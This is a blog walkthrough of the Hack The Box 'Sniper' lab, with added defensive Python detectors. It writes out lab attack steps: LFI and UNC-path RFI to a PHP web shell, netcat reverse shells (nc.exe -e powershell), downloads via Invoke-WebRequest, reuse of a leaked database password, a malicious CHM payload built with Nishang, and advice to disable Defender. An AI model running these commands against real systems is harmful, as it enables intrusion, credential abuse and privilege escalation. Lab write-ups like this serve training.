Hack The Box Sniper Writeup and Detailed Walkthrough - 10.10.10.151

Hello, today I’m publishing the writeup and walkthrough of the Sniper Windows machine (10.10.10.151) in my HackTheBox writeup series.

The Sniper (10.10.10.151) Windows machine has a number of vulnerabilities, including LFI (Local File Inclusion) and possibly RFI (Remote File Inclusion). So let us get started.

NMAP SCANNING

As always, I’m going to add the machine IP address 10.10.10.151 to my /etc/hosts as “sniper.htb”. In the next step I will initiate the nmap scan.

Result:

 ⚡ ⚙  root@ns09~/htb/sniper nmap -sC -Pn -sV -oA nmap.txt 10.10.10.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-16 16:46 +03
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.25% done; ETC: 16:49 (0:02:45 remaining)
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.68s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-12-16T21:47:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.16 seconds
 ⚡ ⚙  root@ns09 ~/htb/sniper master ±

nmap revealed a few open ports: the web server (IIS 10.0) on port 80, MSRPC on port 135, NetBIOS on port 139 and SMB on port 445. The host script output also shows that SMB message signing is enabled but not required.

Webserver Enumeration

Let’s look into the website hosted on port 80.

After some manual enumeration, I found the language selection option on the blog’s (http://sniper.htb/blog/index.php) “about us” page, e.g. http://10.10.10.151/blog?lang=blog-en.php. This is where I’m going to concentrate, as the link blog?lang=blog-en.php looks vulnerable to LFI. I also wanted to confirm whether the machine is vulnerable to RFI, so I started my Python web server and called it from the link, but that failed.

LFI (Local File Inclusion) to RFI to Reverse Shell to User.txt

As I confirmed that RFI is blocked, I need to bypass the RFI restriction to get inside the system. There are several ways; I’m going to use the IndiSHELL way to bypass the restriction. Before that, I’d like to confirm that LFI is still a thing on this box, but how? Follow me…

I sent a Burp request with a modified header. The new header included a payload requesting the contents of the Windows system hosts file (WINDOWS\System32\drivers\etc\hosts). After running the Burp request I successfully read the contents of the hosts file, see the screenshot below.

With the LFI vulnerability on this box confirmed, my next task is to convert this LFI into RFI so that I can reach the box from an external connection and get a reverse shell. As I mentioned above, the IndiSHELL guys published a cool method for this; let us get the shell using it.

I cleared my current Samba configuration (/etc/samba/smb.conf) and set it up as per the IndiSHELL configuration plus a bit of my own knowledge; the final config file looks like the one below. Then restart the Samba service.

echo > /etc/samba/smb.conf

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[nav1n]
comment = Sniper Reverse Shell
path = /root/htb/sniper/www
guest ok = yes
browsable = yes
create mask = 0600
directory mask = 0700

Now that my Samba share is up and running, I’m going to copy the PHP shell (https://github.com/WhiteWinterWolf/wwwolf-php-webshell) into the Samba directory.

Running The PHP Shell

Everything is now set up correctly. Let us go to the Sniper website and add the following to the LFI URL: \\10.10.14.4\nav1n\nshell.php
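Putting on the defender’s hat for the include parameter used above: the following is an added example (my own code, not part of this write-up or of the Sniper box) of the log-review rule I would run over the IIS logs for the lang= parameter. It tells apart the plain traversal read of the hosts file, the http:// include that failed, and the UNC include through the SMB share, and it carries the exact-match allowlist that would have stopped all three. Every log line is constructed, and the allowlist entries other than blog-en.php are assumed sibling language files.

```python
"""Log-review rule for the lang= include parameter (added example, not from the write-up).

Classifies each lang= value found in IIS W3C log lines as allowed, local-traversal,
url-include or unc-include, and shows the exact-match allowlist the application
should have enforced. Every log line and every allowlist entry except blog-en.php
is constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote

# Constructed allowlist: blog-en.php is the only file name seen in the write-up;
# the other two are assumed sibling language files.
ALLOWED_LANGS = frozenset({"blog-en.php", "blog-fr.php", "blog-de.php"})

# Constructed IIS log excerpt. IIS separates W3C fields with single spaces,
# replaces spaces inside a field with '+', and logs the query string as received.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-12-16 21:47:28 10.10.10.151 GET /blog/index.php lang=blog-en.php 80 - 10.10.14.4 Mozilla/5.0+(X11) 200
2019-12-16 21:48:01 10.10.10.151 GET /blog/index.php lang=..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts 80 - 10.10.14.4 Mozilla/5.0+(X11) 200
2019-12-16 21:49:10 10.10.10.151 GET /blog/index.php lang=http://10.10.14.4:8000/shell.php 80 - 10.10.14.4 Mozilla/5.0+(X11) 500
2019-12-16 21:50:33 10.10.10.151 GET /blog/index.php lang=%5C%5C10.10.14.4%5Cnav1n%5Cshell.php 80 - 10.10.14.4 Mozilla/5.0+(X11) 200
2019-12-16 21:52:40 10.10.10.151 GET /index.php - 80 - 10.10.14.9 Mozilla/5.0+(X11) 200
""".splitlines()


def classify_lang(value: str) -> str:
    """Classify one lang= value. Order matters: UNC before URL before traversal."""
    v = unquote(value)          # tolerate a second layer of percent-encoding
    low = v.lower()
    if low.startswith(("\\\\", "//")):
        # \\host\share\file.php is a *local* path to PHP on Windows, so it is
        # included even with allow_url_include=Off: this is the RFI bypass.
        return "unc-include"
    if re.match(r"^[a-z][a-z0-9+.-]*://", low):
        # http://, ftp:// or any other scheme: refused when allow_url_include=Off
        return "url-include"
    if ".." in v or re.match(r"^[a-z]:[\\/]", low) or low.startswith(("/", "\\")):
        # ..\..\windows\... or an absolute path: plain LFI
        return "local-traversal"
    if v in ALLOWED_LANGS:
        return "allowed"
    return "unknown"


def is_allowed(value: str) -> bool:
    """The server-side fix: exact allowlist match, no path arithmetic at all."""
    return unquote(value) in ALLOWED_LANGS


def parse_w3c(lines):
    """Yield one dict per data line, using the most recent #Fields: header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields: header")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue            # skip a malformed line instead of aborting the review
        yield dict(zip(fields, parts))


def scan_iis_log(lines):
    """Return (time, client ip, decoded lang value, verdict) for every lang= that is not allowed."""
    findings = []
    for row in parse_w3c(lines):
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        for lang in parse_qs(query, keep_blank_values=True).get("lang", []):
            verdict = classify_lang(lang)
            if verdict != "allowed":
                findings.append((row["time"], row["c-ip"], unquote(lang), verdict))
    return findings


if __name__ == "__main__":
    for time, client, lang, verdict in scan_iis_log(SAMPLE_LOG):
        print(f"{time} {client} {verdict:16} {lang}")
```

Run it with python3 to print the three findings. The point of is_allowed is that it rejects by shape rather than by scheme: turning off allow_url_include refuses http:// but not a \\host\share path, because PHP on Windows hands that path to the file system as a local file, which is exactly why the include above still works.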

Testing the PHP shell:

OK, everything looks to be working perfectly. But I’m still unable to run a reverse shell; for that I need to upload netcat (nc.exe) to the Sniper machine. I was not able to upload nc.exe to the root of C:\, so let’s create a subdirectory inside C:\ and upload it there.

I uploaded nc.exe to my nav1n directory successfully.

Getting The Reverse Shell

Now that netcat is in place and waiting for my command, I’m going to start the listener on my local Kali machine. The command: nc.exe -e powershell 10.10.14.4 8888. I now have a reverse shell as iusr.

After a little recon, I found a PHP file called db.php which contained credentials for a dbuser.

dbuser:36mEAhz/B8xQ~2VM

But after looking at the users on the machine, I realised there is a user called “Chris”, and we need to privesc to Chris to get user.txt.

Privilege Escalation and User.txt

So far I have no idea what Chris’ password is, but I have a password from the db.php file. I’m going to use PowerShell to build a credential object using the password I have.

$password = "36mEAhz/B8xQ~2VM" | ConvertTo-SecureString -AsPlainText -Force
$username = "nt authority\Chris"
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
echo $credential

Let us use Invoke-Command to run a command as Chris.
Invoke-Command -ComputerName sniper -Credential $credential -ScriptBlock {whoami}

ANOTHER WAY TO ADD CREDS TO USER CHRIS

The following is another way to build Chris’ credentials; both will give you a reverse shell as Chris when you run Invoke-Command.

$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$s = New-PSSession -ComputerName Sniper -Credential $credential
Invoke-Command -Session $s -ScriptBlock { C:\nav1n\nc.exe -e cmd.exe 10.10.14.8 8885 }

I tried to run nc.exe but unfortunately I don’t have permission to run it: access is denied.

So, I have another plan. I will run a Python HTTP server locally on my Kali box and serve nc.exe from there. I will have my local web server share nc.exe and copy it to Chris’s desktop using the script block.

Command to use (put it in place of {whoami}): {cd C:\Users\Chris\Documents\;$url = "http://10.10.14.4:8088/nc.exe";$output = "C:\Users\Chris\Documents\nc.exe";Invoke-WebRequest -Uri $url -OutFile $output;dir}

And nc.exe is successfully uploaded to Chris’ Documents.

Now I need to set up another listener to get the reverse shell as Chris. The script block to get the reverse shell is {cd C:\Users\Chris\Documents\;./nc.exe -e PowerShell 10.10.14.4 8884}.

After running the above script block, I immediately got a reverse shell as Chris in my new listener.

User.txt

Privilege Escalation Part 2: Journey Towards Root

After a brief recon, I found a CHM file called “instructions.chm” (Compiled HTML file, a Windows help file) in Chris’ Downloads folder. The extension is very interesting. I also found another interesting text file, “note.txt”, in C:\Docs.

CHM files are normally used by Microsoft and third-party vendors to ship the help for a particular program; if you visit the installation folder of almost any Windows program you will find at least one .chm file containing that application’s help. CHM abuse has been in the news for a very long time now: an attacker can exploit a malicious CHM file to achieve arbitrary remote code execution as Administrator.

Some CHM Exploits:

C:\Docs\Note.txt

The text file note.txt in the Docs folder has a message to Chris from the CEO of Sniper Co. The text file reads:

Hi Chris,

Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you’ve prepared the documentation for our new app. Drop it here when you’re done with it.

Regards,
Sniper CEO.

I managed to download the instructions.chm file and it reads like this 🙂

Well, as always, a rogue employee is very dangerous; if you have a rogue employee in your IT department or backend development team, I believe you are scr****d. The employee intentionally left the vulnerable CHM file in the Documents folder, hoping that someone, presumably the CEO himself, would open it, trigger the hidden payload and compromise the server!!!

Let us be that “SOMEONE” and teach that dumb CEO a lesson. The CHM can be exploited using Nishang’s Out-CHM.ps1 (https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) PowerShell script.

Creating A Malicious CHM File

Note: antivirus and Windows Defender will block the CHM file, flagging it as malware, so I suggest you do this in a virtual environment with all security features disabled; make sure Defender is turned off. If your current AV has an allow option, you can also manually allow the script.

I downloaded the script from this GitHub repo to my Windows machine and imported it as a module.

In the next step, I will create a CHM file with a malicious payload. The command I ran is below:

Out-CHM -Payload "cd C:\Users\Chris\Documents\;./nc.exe 10.10.14.4 8877 -e powershell" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

The command created a CHM file called doc.chm in my current directory (Desktop). I moved it to my Kali machine and uploaded it to the Sniper machine using Python’s SimpleHTTPServer. I used the same command I used to upload nc.exe in the previous step, with a small modification.

Set up your listener

Now it’s time to set up my last listener before I get Administrator. The listener in my case is the one attached to my malicious CHM file (x.x.x.x 8877).

A working command to download the malicious doc.chm file: Invoke-Command -ComputerName sniper -Credential $credential -ScriptBlock {$url = "http://10.10.14.4:9999/doc.chm";$output = "C:\Docs\instructions.chm";Invoke-WebRequest -Uri $url -OutFile $output}

So when the CEO opens the CHM file, my listener activates. The prompt still says Chris\Documents, but WHOAMI shows I’m Administrator. I read root.txt without wasting a minute.
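From the defender’s side, the two shells above (the one started through PowerShell remoting as Chris, and the one the CHM launched as Administrator) leave the same kind of trace: a process that should never spawn a shell doing exactly that. The following is an added example of my own, not code from this write-up or from Nishang, which triages constructed records shaped like Windows Security Event ID 4688 (process creation with command-line auditing enabled). Assumptions: the IIS PHP host is php-cgi.exe, the field names follow the 4688 schema, and every record is constructed.

```python
"""Process-creation triage for the shells this box produces (added example, not from the write-up).

Checks constructed records shaped like Windows Security Event ID 4688 for three
things: a shell or netcat spawned by a parent that should never spawn one
(wsmprovhost.exe hosts PowerShell remoting, hh.exe renders CHM help files,
php-cgi.exe runs PHP under IIS FastCGI), netcat run with -e, and an executable
launched from a user-writable path such as C:\\Users\\...\\Documents or C:\\nav1n.
"""
import ntpath
import re

# Parents that should not spawn shells. php-cgi.exe / w3wp.exe are an assumption
# about how PHP runs under IIS on this box; adjust to what your web tier actually runs.
SUSPICIOUS_PARENTS = {"wsmprovhost.exe", "hh.exe", "php-cgi.exe", "w3wp.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "nc.exe", "nc64.exe", "ncat.exe"}
# Top-level directories a normal user cannot write to; anything else under C:\ is suspect.
STANDARD_ROOTS = {"windows", "program files", "program files (x86)", "programdata", "inetpub"}
NETCAT_EXEC = re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s", re.IGNORECASE)

# Constructed records; field names follow the 4688 event schema.
SAMPLE_EVENTS = [
    {"TimeCreated": "2019-12-16T22:05:11Z", "SubjectUserName": "IUSR",
     "ParentProcessName": r"C:\PHP\php-cgi.exe",
     "NewProcessName": r"C:\nav1n\nc.exe",
     "CommandLine": r"nc.exe -e powershell 10.10.14.4 8888"},
    {"TimeCreated": "2019-12-16T22:31:40Z", "SubjectUserName": "Chris",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "NewProcessName": r"C:\Users\Chris\Documents\nc.exe",
     "CommandLine": r'"C:\Users\Chris\Documents\nc.exe" -e PowerShell 10.10.14.4 8884'},
    {"TimeCreated": "2019-12-16T22:33:02Z", "SubjectUserName": "Chris",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Docs\note.txt"},
    {"TimeCreated": "2019-12-16T22:50:19Z", "SubjectUserName": "Administrator",
     "ParentProcessName": r"C:\Windows\hh.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c cd C:\Users\Chris\Documents\;nc.exe 10.10.14.4 8877 -e powershell"},
    {"TimeCreated": "2019-12-16T22:51:00Z", "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]


def from_user_writable_path(path: str) -> bool:
    """True for C:\\Users\\... and for any top-level directory that is not a standard system root."""
    parts = path.lower().split("\\")
    if len(parts) < 3 or not re.fullmatch(r"[a-z]:", parts[0]):
        return False
    return parts[1] == "users" or parts[1] not in STANDARD_ROOTS


def rules_for(event: dict) -> list:
    """Return the names of every rule the event trips (empty list when benign)."""
    parent = ntpath.basename(event["ParentProcessName"]).lower()
    child = ntpath.basename(event["NewProcessName"]).lower()
    hits = []
    if parent in SUSPICIOUS_PARENTS and child in SHELL_CHILDREN:
        hits.append(f"shell-spawned-by-{parent}")
    if NETCAT_EXEC.search(event.get("CommandLine", "")):
        hits.append("netcat-exec")
    if child.endswith(".exe") and from_user_writable_path(event["NewProcessName"]):
        hits.append("exe-from-user-writable-path")
    return hits


def triage(events):
    """Return one finding per event that trips at least one rule, in input order."""
    findings = []
    for event in events:
        rules = rules_for(event)
        if rules:
            findings.append({"time": event["TimeCreated"], "user": event["SubjectUserName"],
                             "process": ntpath.basename(event["NewProcessName"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['time']} {f['user']:14} {f['process']:10} {', '.join(f['rules'])}")
```

Two caveats when applying this to real telemetry: 4688 only carries the command line if the “Include command line in process creation events” policy is on, and the Invoke-WebRequest download step runs inside wsmprovhost.exe without creating a process at all, so it is visible only through PowerShell script block logging (Event ID 4104) or network telemetry, not through this rule.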

Thanks for reading. Come back for more soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

anonymous, 6 months ago:

This box was a real pain in the ass. How did you manage to download the instructions? The box was pretty tight.

anonymous, 6 months ago:

How do you retrieve the instructions.chm to your machine and view the CHM inside? Mine said it was corrupted and can’t be opened or manually reverse engineered.
